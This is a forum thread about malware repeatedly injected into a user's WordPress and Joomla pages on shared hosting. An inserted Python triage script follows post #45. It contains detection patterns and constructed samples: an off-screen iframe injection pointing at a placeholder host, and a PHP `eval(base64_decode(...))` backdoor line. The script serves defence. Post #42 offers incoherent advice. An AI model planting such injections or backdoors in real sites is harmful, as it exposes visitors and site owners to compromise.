Virus on the server
 
bobo05, 27 Oct 2011 11:13:51
Joined: 8 Dec 2009
1804 posts
+1057-14317
#41
OvcaX:
It would be best to ask the hosting provider how this happens.

1. You have an infected FTP client
2. Someone stole your password and is uploading the files themselves
3. You have an exploitable Joomla or something similar

These are the most common cases we see.

First of all, change the password and stop storing it in the FTP client.
Update all scripts to the latest versions.
Check your computer with an antivirus.

According to the logs, only 2 IPs connected in the last month: mine and a colleague's.
I changed the password from an uninfected computer.
I updated everything, sent it to SGH, and they said:
No, it is not a root kit, the server itself is not infected. It is only the files hosted under your account.
It is most likely that the problem was caused due to a vulnerability found in one of Wordpress scripts or plugins.
The best advice would be backing up Wordpress databases and images, re-installing Wordpress blogs from scratch and then restoring databases/images.
Even if you remove all malware found by our anti virus, there may be still a back door injected to one of your scripts which can't be detected.
And in this case the problem will happen again.

Now I've cleaned the server completely, deleted all the test WordPress installs I had up for trying out themes, and I also suspect one script, or rather a web game, that a colleague had up there. If this shows up again, what's the best thing to do? Go into WP, export the content, and then install the whole thing fresh again?
Facebook and AdWords coupons for 1€!
Two little words open many doors: "PULL" and "PUSH"!
 
admin-bic8, 29 Oct 2011 20:13:44
Joined: 29 Oct 2011
1 post
000
#42
What WordPress do you have? Lately they can be handy for encoding individual web pages, and you store the passwords on an auxiliary hard drive, which above all has to be bigger so you can make a backup of the site or copies of your Windows.
 
bobo05, 12 Nov 2011 16:46:37
Joined: 8 Dec 2009
1804 posts
+1057-14317
#43
Something is wrong with the server again; it messed up all my Joomla pages, but Google hasn't reported the pages as infected yet.

I wrote to SGH, and this is what they sent me. Does anyone have an idea what I should do?
 
Weby, 12 Nov 2011 18:04:36
Joined: 1 May 2008
700 posts
+88-182
#44
If you don't use exec, disable it in php.ini :)
No Packages marked for Update
 
bobo05, 14 Nov 2011 11:48:28
Joined: 8 Dec 2009
1804 posts
+1057-14317
#45
Meh, the virus showed up again...
This is what I found in the HTML file:


Apparently I'll have to move the whole thing somewhere else...
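An added triage script (not from the thread or any project mentioned in it) for the two things discussed here: the injection bobo05 pasted in post #45, a NUL-prefixed `<script>` wrapping the p,a,c,k,e,d packer whose word list carries a long hex string that the script's own decoder writes into the page as an off-screen iframe, and the `base64_decode` question from post #46. It decodes the hex with Python instead of executing the JavaScript; the sample HTML, the sample PHP backdoor line and the host `malicious.invalid` are constructed, and the beez line is the one quoted in post #46.

```python
import re

# Patterns for the injection in post #45: a NUL byte, then a <script> wrapping
# the p,a,c,k,e,d packer, whose word list carries a long hex string that the
# script's own decoder turns into markup and document.write()s into the page.
SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
PACKER_RE = re.compile(r"eval\(function\(p,a,c,k,e,d\)")
HEX_RUN_RE = re.compile(r"[0-9a-fA-F]{40,}")
OFFSCREEN_RE = re.compile(r"(left|top):\s*-\d{3,}px|<iframe", re.I)
# For post #46: base64_decode() of a long literal is the usual shape of an
# injected backdoor; base64_decode($var), as in the beez template, is ordinary
# code and is deliberately not flagged on its own.
PHP_B64_LITERAL_RE = re.compile(r"base64_decode\(\s*['\"][A-Za-z0-9+/=]{40,}['\"]")

def decode_hex(blob):
    """Decode a hex run in Python (two digits per byte), never running the JS."""
    if len(blob) % 2:
        blob = "0" + blob
    return bytes.fromhex(blob).decode("latin-1")

def scan_html(text):
    """Return one finding per packed <script>, with its hex payloads decoded."""
    findings = []
    for m in SCRIPT_RE.finditer(text):
        body = m.group(1)
        if not PACKER_RE.search(body):
            continue
        payloads = [decode_hex(h) for h in HEX_RUN_RE.findall(body)]
        findings.append({
            "offset": m.start(),
            "nul_prefix": text[max(m.start() - 1, 0):m.start()] == "\0",
            "payloads": payloads,
            "hidden_iframe": any(OFFSCREEN_RE.search(p) for p in payloads),
        })
    return findings

def scan_php(text):
    """Return 1-based line numbers where base64_decode() is fed a long literal."""
    return [i for i, line in enumerate(text.splitlines(), 1)
            if PHP_B64_LITERAL_RE.search(line)]

# Constructed sample HTML modelled on the thread's injection (placeholder host).
SAMPLE_PAYLOAD = ('<div style="position: absolute; left: -1999px; top: -2997px;">'
                  '<iframe width="3" height="4" src="http://malicious.invalid/i.php?go=1">'
                  '</iframe></div>')
SAMPLE_HTML = ("<html><body><p>ok</p>\0<script>eval(function(p,a,c,k,e,d){return p}('"
               + SAMPLE_PAYLOAD.encode().hex() + "',40,40,'|'.split('|'),0,{}))</script></body></html>")
# The beez line from post #46 (benign) beside a constructed injected line.
SAMPLE_PHP = ("$return = base64_encode(base64_decode($return).'#content');\n"
              "eval(base64_decode('" + "QUFB" * 20 + "'));\n")
```

Run `scan_html` over every .html/.php file under the web root and `scan_php` over the .php files; decoded payloads show which host each injected iframe points at without loading it.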
 
bobo05, 15 Nov 2011 22:29:02
Joined: 8 Dec 2009
1804 posts
+1057-14317
#46
I'm not exactly an expert, but I think I found the source (at least for the Joomla pages).

In the beez theme, in default.php, I found this line:
$return = base64_encode(base64_decode($return).'#content');

Could this be what keeps rewriting this virus?
 
Matjaž, 15 Nov 2011 22:44:05
Joined: 21 Sep 2007
1656 posts
+873-1178
#47
If I'm not mistaken, that is just a statement that returns some base64-encoded content into the articles.
That is the default in that file and has nothing to do with your problems.
last edited by Matjaž, 15 Nov 2011 22:49:40
 
bobo05, 15 Nov 2011 22:54:09
Joined: 8 Dec 2009
1804 posts
+1057-14317
#48
But the interesting thing is that when I deleted it, all the pages started displaying normally.
 
Matjaž, 15 Nov 2011 23:05:53
Joined: 21 Sep 2007
1656 posts
+873-1178
#49
Wouldn't that probably happen too if you deleted only #content?
 